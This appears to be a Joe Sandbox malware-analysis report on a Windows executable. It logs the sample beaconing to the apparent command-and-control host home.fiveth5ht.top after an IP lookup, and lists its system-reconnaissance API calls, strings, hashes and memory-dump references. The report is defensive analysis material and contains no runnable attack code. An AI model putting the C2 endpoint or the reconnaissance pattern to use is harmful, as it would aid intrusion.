Dec 28, 2024 09:48:27.106024981 CET	284	OUT	POST /OyKvQKriwnyyWjwCxSXF1735186862 HTTP/1.1 Host: home.fiveth5ht.top Accept: / Content-Type: application/json Content-Length: 143 Data Raw: 7b 20 22 69 64 31 22 3a 20 22 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 35 30 33 20 53 65 72 76 69 63 65 20 55 6e 61 76 61 69 6c 61 62 6c 65 3c 5c 2f 68 31 3e 5c 6e 4e 6f 20 73 65 72 76 65 72 20 69 73 20 61 76 61 69 6c 61 62 6c 65 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 69 73 20 72 65 71 75 65 73 74 2e 5c 6e 3c 5c 2f 62 6f 64 79 3e 3c 5c 2f 68 74 6d 6c 3e 5c 6e 22 2c 20 22 64 61 74 61 22 3a 20 22 44 6f 6e 65 31 22 20 7d Data Ascii: { "id1": "<html><body><h1>503 Service Unavailable<\/h1>\nNo server is available to handle this request.\n<\/body><\/html>\n", "data": "Done1" }
Dec 28, 2024 09:48:28.416431904 CET	212	IN	HTTP/1.0 503 Service Unavailable Cache-Control: no-cache Connection: close Content-Type: text/html Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 35 30 33 20 53 65 72 76 69 63 65 20 55 6e 61 76 61 69 6c 61 62 6c 65 3c 2f 68 31 3e 0a 4e 6f 20 73 65 72 76 65 72 20 69 73 20 61 76 61 69 6c 61 62 6c 65 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 69 73 20 72 65 71 75 65 73 74 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <html><body><h1>503 Service Unavailable</h1>No server is available to handle this request.</body></html>

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.10	49719	34.226.108.155	443	8076	C:\Users\user\Desktop\HGFSqmKwd5.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-28 08:48:21 UTC	52	OUT	GET /ip HTTP/1.1 Host: httpbin.org Accept: /
2024-12-28 08:48:22 UTC	224	IN	HTTP/1.1 200 OK Date: Sat, 28 Dec 2024 08:48:22 GMT Content-Type: application/json Content-Length: 31 Connection: close Server: gunicorn/19.9.0 Access-Control-Allow-Origin: * Access-Control-Allow-Credentials: true
2024-12-28 08:48:22 UTC	31	IN	Data Raw: 7b 0a 20 20 22 6f 72 69 67 69 6e 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 0a 7d 0a Data Ascii: { "origin": "8.46.123.189"}

Target ID:	0
Start time:	03:48:16
Start date:	28/12/2024
Path:	C:\Users\user\Desktop\HGFSqmKwd5.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\HGFSqmKwd5.exe"
Imagebase:	0xe00000
File size:	4'491'776 bytes
MD5 hash:	23A5D24635B116F7FF8A1835275027DE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	2.9%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	23.5%
Total number of Nodes:	221
Total number of Limit Nodes:	32

Executed Functions

Function 00E3F100 Relevance: 20.1, Strings: 15, Instructions: 1304COMMON

Download Yara Rule

Strings

Connection timeout after %lld ms, xrefs: 00E400AC
ipv4, xrefs: 00E3F331, 00E3F34B, 00E3F36C, 00E3F3EC, 00E3F5BB
Failed to connect to %s port %u after %lld ms: %s, xrefs: 00E40254
Connection time-out, xrefs: 00E3F2A3
%s connect timeout after %lldms, move on!, xrefs: 00E3FA33
%s connect -> %d, connected=%d, xrefs: 00E3F720
Connected to %s (%s) port %u, xrefs: 00E40026
%s done, xrefs: 00E3F9CD, 00E3FD27, 00E3FF03
%s starting (timeout=%lldms), xrefs: 00E3FCDD, 00E3FEB1
%s trying next, xrefs: 00E3F8FE
all eyeballers failed, xrefs: 00E400FF
created %s (timeout %lldms), xrefs: 00E3F4BE, 00E3F5DF
%s assess started=%d, result=%d, xrefs: 00E40150, 00E401AE
connect.c, xrefs: 00E3F3BB, 00E3F4FA
ipv6, xrefs: 00E3F3DC

Memory Dump Source

Source File: 00000000.00000002.1482231895.0000000000E01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000000.00000002.1482210725.0000000000E00000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1482231895.0000000001371000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1482231895.00000000014D7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1482231895.00000000014D9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1482729721.00000000014DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1482751437.00000000014DE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1482751437.0000000001666000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1482751437.0000000001780000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1482751437.0000000001788000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1482751437.0000000001861000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1482751437.000000000186A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1482751437.0000000001878000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1483178913.0000000001879000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1483522316.0000000001A34000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1483546609.0000000001A36000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e00000_HGFSqmKwd5.jbxd

Similarity

API ID:
String ID: %s assess started=%d, result=%d$%s connect -> %d, connected=%d$%s connect timeout after %lldms, move on!$%s done$%s starting (timeout=%lldms)$%s trying next$Connected to %s (%s) port %u$Connection time-out$Connection timeout after %lld ms$Failed to connect to %s port %u after %lld ms: %s$all eyeballers failed$connect.c$created %s (timeout %lldms)$ipv4$ipv6
API String ID: 0-1590685507
Opcode ID: 55f6c242bae7818ebfcc8367b637a101658cfef51674b6e577546032169c237d
Instruction ID: a45691bddd66bf8c5e231508223c683fadd273f49bf1bc2fdb54d9b8d68c799f
Opcode Fuzzy Hash: 55f6c242bae7818ebfcc8367b637a101658cfef51674b6e577546032169c237d
Instruction Fuzzy Hash: 69C2A231A043449FD714CF29C489B6ABBE1BF84318F05967DED98AB262D771ED84CB81

Function 00E0255D Relevance: 17.8, APIs: 7, Strings: 3, Instructions: 282
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSystemInfo.KERNELBASE ref: 00E02579
GlobalMemoryStatusEx.KERNELBASE ref: 00E025CC
GetDriveTypeA.KERNELBASE ref: 00E02647
GetDiskFreeSpaceExA.KERNELBASE ref: 00E0267E
KiUserCallbackDispatcher.NTDLL ref: 00E027E2
FindFirstFileW.KERNELBASE ref: 00E028F8
FindNextFileW.KERNELBASE ref: 00E0291F

Strings

@, xrefs: 00E025B4
;%, xrefs: 00E027FE
`, xrefs: 00E029BC

Memory Dump Source

Source File: 00000000.00000002.1482231895.0000000000E01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000000.00000002.1482210725.0000000000E00000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1482231895.0000000001371000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1482231895.00000000014D7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1482231895.00000000014D9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1482729721.00000000014DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1482751437.00000000014DE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1482751437.0000000001666000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1482751437.0000000001780000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1482751437.0000000001788000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1482751437.0000000001861000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1482751437.000000000186A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1482751437.0000000001878000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1483178913.0000000001879000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1483522316.0000000001A34000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1483546609.0000000001A36000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e00000_HGFSqmKwd5.jbxd

Similarity

API ID: FileFind$CallbackDiskDispatcherDriveFirstFreeGlobalInfoMemoryNextSpaceStatusSystemTypeUser
String ID: ;%$@$`
API String ID: 3271271169-3130814153
Opcode ID: 3fd6268ff41831b3bee1f635f97c692c3fb583c55c481e557226f6e7b3247130
Instruction ID: f73dad3e562db8c6bf76bc2f1786e5cff273319bf5f2394ef81b3edce511e45b
Opcode Fuzzy Hash: 3fd6268ff41831b3bee1f635f97c692c3fb583c55c481e557226f6e7b3247130
Instruction Fuzzy Hash: F4D1A9B49153199FCB10EF68C5846AEBBF4BF88348F00896DE899D7350E7359A84CF52

Function 00E029FF Relevance: 12.6, APIs: 6, Strings: 1, Instructions: 321
registryfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FindFirstFileA.KERNELBASE ref: 00E02A27
RegOpenKeyExA.KERNELBASE ref: 00E02A8A
CharUpperA.USER32 ref: 00E02AEF
QueryFullProcessImageNameA.KERNELBASE ref: 00E02C26
CloseHandle.KERNELBASE ref: 00E02C49
CloseHandle.KERNELBASE ref: 00E02DFC

Strings

0, xrefs: 00E02DA9

Memory Dump Source

Source File: 00000000.00000002.1482231895.0000000000E01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000000.00000002.1482210725.0000000000E00000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1482231895.0000000001371000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1482231895.00000000014D7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1482231895.00000000014D9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1482729721.00000000014DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1482751437.00000000014DE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1482751437.0000000001666000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1482751437.0000000001780000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1482751437.0000000001788000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1482751437.0000000001861000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1482751437.000000000186A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1482751437.0000000001878000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1483178913.0000000001879000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1483522316.0000000001A34000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1483546609.0000000001A36000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e00000_HGFSqmKwd5.jbxd

Similarity

API ID: CloseHandle$CharFileFindFirstFullImageNameOpenProcessQueryUpper
String ID: 0
API String ID: 2406880114-4108050209
Opcode ID: d87031dc2b3eaf99eb9cd3aabc743b73e9b44909936cbd42bf860dcd755f22ec
Instruction ID: 01e789363213f74f5bf1cbcf3072d27b1be5dbe9aa58f09e853bedbdd28a6a3a
Opcode Fuzzy Hash: d87031dc2b3eaf99eb9cd3aabc743b73e9b44909936cbd42bf860dcd755f22ec
Instruction Fuzzy Hash: FDE1E7B49053059FDB10EF68D9846ADBBF4BF48308F40886DE998E7354E7389988CF42

Function 00E105B0 Relevance: 9.1, APIs: 3, Strings: 2, Instructions: 377
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WSAEventSelect.WS2_32(?,?,?), ref: 00E10712
WSAEventSelect.WS2_32(?,?,00000000), ref: 00E109DD
WSAEnumNetworkEvents.WS2_32(?,00000000,00000000), ref: 00E109FC

Strings

N=, xrefs: 00E10A65
multi.c, xrefs: 00E107B2

Memory Dump Source

Source File: 00000000.00000002.1482231895.0000000000E01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000000.00000002.1482210725.0000000000E00000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1482231895.0000000001371000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1482231895.00000000014D7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1482231895.00000000014D9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1482729721.00000000014DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1482751437.00000000014DE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1482751437.0000000001666000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1482751437.0000000001780000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1482751437.0000000001788000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1482751437.0000000001861000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1482751437.000000000186A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1482751437.0000000001878000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1483178913.0000000001879000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1483522316.0000000001A34000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1483546609.0000000001A36000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e00000_HGFSqmKwd5.jbxd

Similarity

API ID: EventSelect$EnumEventsNetwork
String ID: N=$multi.c
API String ID: 2170980988-1544942961
Opcode ID: 47657415a57d2ad2b7da3eb5871af187737b661bd22aaf11c3a8a024864274dc
Instruction ID: 771ae55b2f2b8f5c9ad13217f707da506a372d98e95d214a8ddfc14086a1e57b
Opcode Fuzzy Hash: 47657415a57d2ad2b7da3eb5871af187737b661bd22aaf11c3a8a024864274dc
Instruction Fuzzy Hash: 63D1AF756083019FE711DF24C891BABB7E9FF94348F04682DF895A6281E7B4E9C4CB52

Function 00ECB180 Relevance: 5.6, APIs: 1, Strings: 2, Instructions: 323
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

getsockname.WS2_32(-00000020,-00000020,?), ref: 00ECB2B7

Strings

cur != NULL, xrefs: 00ECB3F2
ares__sortaddrinfo.c, xrefs: 00ECB3ED

Memory Dump Source

Source File: 00000000.00000002.1482231895.0000000000E01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000000.00000002.1482210725.0000000000E00000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1482231895.0000000001371000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1482231895.00000000014D7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1482231895.00000000014D9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1482729721.00000000014DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1482751437.00000000014DE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1482751437.0000000001666000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1482751437.0000000001780000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1482751437.0000000001788000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1482751437.0000000001861000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1482751437.000000000186A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1482751437.0000000001878000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1483178913.0000000001879000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1483522316.0000000001A34000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1483546609.0000000001A36000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e00000_HGFSqmKwd5.jbxd

Similarity

API ID: getsockname
String ID: ares__sortaddrinfo.c$cur != NULL
API String ID: 3358416759-2430778319
Opcode ID: 7d09e00df0be278b49812c4906a8087496b3a900653665f9787b9ef5a5bc9fe1
Instruction ID: d8d5b984575b4d8dd991c642dc71dbdd85d97914cda94b7c85e90ee54716bec0
Opcode Fuzzy Hash: 7d09e00df0be278b49812c4906a8087496b3a900653665f9787b9ef5a5bc9fe1
Instruction Fuzzy Hash: DBC15E716043059FD718DF28CA82B6A77E6FF88304F04996CE845AB3A1D776ED46CB81

Function 00E16FA0 Relevance: 1.8, APIs: 1, Instructions: 261COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1482231895.0000000000E01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000000.00000002.1482210725.0000000000E00000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1482231895.0000000001371000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1482231895.00000000014D7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1482231895.00000000014D9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1482729721.00000000014DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1482751437.00000000014DE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1482751437.0000000001666000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1482751437.0000000001780000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1482751437.0000000001788000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1482751437.0000000001861000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1482751437.000000000186A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1482751437.0000000001878000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1483178913.0000000001879000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1483522316.0000000001A34000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1483546609.0000000001A36000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e00000_HGFSqmKwd5.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9887a52f8ce9b6dfac7fe49d382f22920ac8e17ee5a2eee7e916f6325b249f15
Instruction ID: c1fc80fc1a2dcb9fbe535beb25d20439545c0914a784a7cbd7e659a81e7c80e6
Opcode Fuzzy Hash: 9887a52f8ce9b6dfac7fe49d382f22920ac8e17ee5a2eee7e916f6325b249f15
Instruction Fuzzy Hash: A891D23060D3094BD7358A2888947FB72F5EBC4B28F24AB2CE8E9531D4E7759DC1D681

Function 00E01160 Relevance: 1.7, APIs: 1, Instructions: 208COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNELBASE ref: 00E01238

Memory Dump Source

Source File: 00000000.00000002.1482231895.0000000000E01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000000.00000002.1482210725.0000000000E00000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1482231895.0000000001371000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1482231895.00000000014D7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1482231895.00000000014D9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1482729721.00000000014DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1482751437.00000000014DE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1482751437.0000000001666000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1482751437.0000000001780000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1482751437.0000000001788000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1482751437.0000000001861000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1482751437.000000000186A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1482751437.0000000001878000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1483178913.0000000001879000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1483522316.0000000001A34000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1483546609.0000000001A36000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e00000_HGFSqmKwd5.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: bd531cc8c64ad8c16538fb83144a7dc3687c1e7582355c218b81fd75fafa40fd
Instruction ID: a4d0fb7fb0c580a9f1448b1049296e42758672736ed9832dd1894b9aeba1794a
Opcode Fuzzy Hash: bd531cc8c64ad8c16538fb83144a7dc3687c1e7582355c218b81fd75fafa40fd
Instruction Fuzzy Hash: 0381BFB19063018FDF24EFA4E4843ADB7F0FB54308F54856DD989AF2A8D7359884DB42

Function 00E011A3 Relevance: 1.6, APIs: 1, Instructions: 116COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNELBASE ref: 00E01238

Memory Dump Source

Source File: 00000000.00000002.1482231895.0000000000E01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000000.00000002.1482210725.0000000000E00000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1482231895.0000000001371000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1482231895.00000000014D7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1482231895.00000000014D9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1482729721.00000000014DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1482751437.00000000014DE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1482751437.0000000001666000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1482751437.0000000001780000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1482751437.0000000001788000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1482751437.0000000001861000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1482751437.000000000186A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1482751437.0000000001878000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1483178913.0000000001879000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1483522316.0000000001A34000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1483546609.0000000001A36000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e00000_HGFSqmKwd5.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: b401601cf8bdbcb341b10d8f1a09d7c74b1d7add16adec10d3b50a1097cc0894
Instruction ID: db11ff4781f2cea6e9ecfcc0050842081372e40e6be6d35ab4e0114328f2af7a
Opcode Fuzzy Hash: b401601cf8bdbcb341b10d8f1a09d7c74b1d7add16adec10d3b50a1097cc0894
Instruction Fuzzy Hash: CE414CB0A063058FDB25EF68E48436DB7F0FB54308F15956DD889AB398D774A885CF42

Function 00E013C9 Relevance: 1.6, APIs: 1, Instructions: 110COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNELBASE ref: 00E01238

Memory Dump Source

Source File: 00000000.00000002.1482231895.0000000000E01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000000.00000002.1482210725.0000000000E00000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1482231895.0000000001371000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1482231895.00000000014D7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1482231895.00000000014D9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1482729721.00000000014DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1482751437.00000000014DE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1482751437.0000000001666000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1482751437.0000000001780000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1482751437.0000000001788000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1482751437.0000000001861000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1482751437.000000000186A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1482751437.0000000001878000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1483178913.0000000001879000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1483522316.0000000001A34000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1483546609.0000000001A36000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e00000_HGFSqmKwd5.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: 4f9b18e4900dd7bfaffbf224e46eff1882a28b72e9d5d6474f28f80e78b183de
Instruction ID: 1071407fc6df920d9cefab2358b4fcb223b0db2a7380a88e77031afe52c7bc66
Opcode Fuzzy Hash: 4f9b18e4900dd7bfaffbf224e46eff1882a28b72e9d5d6474f28f80e78b183de
Instruction Fuzzy Hash: 2E4118B4A063058FDB25EF64E18436DB7F0FB54308F10896DD989AB368D734A885CF42

Function 00ECA8C0 Relevance: 1.5, APIs: 1, Instructions: 39COMMON

Download Yara Rule

APIs

recvfrom.WS2_32(?,?,?,00000000,00001001,?,?,?,?,?,00EB712E,?,?,?,00001001,00000000), ref: 00ECA90C

Memory Dump Source

Source File: 00000000.00000002.1482231895.0000000000E01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000000.00000002.1482210725.0000000000E00000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1482231895.0000000001371000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1482231895.00000000014D7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1482231895.00000000014D9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1482729721.00000000014DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1482751437.00000000014DE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1482751437.0000000001666000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1482751437.0000000001780000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1482751437.0000000001788000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1482751437.0000000001861000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1482751437.000000000186A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1482751437.0000000001878000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1483178913.0000000001879000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1483522316.0000000001A34000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1483546609.0000000001A36000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e00000_HGFSqmKwd5.jbxd

Similarity

API ID: recvfrom
String ID:
API String ID: 846543921-0
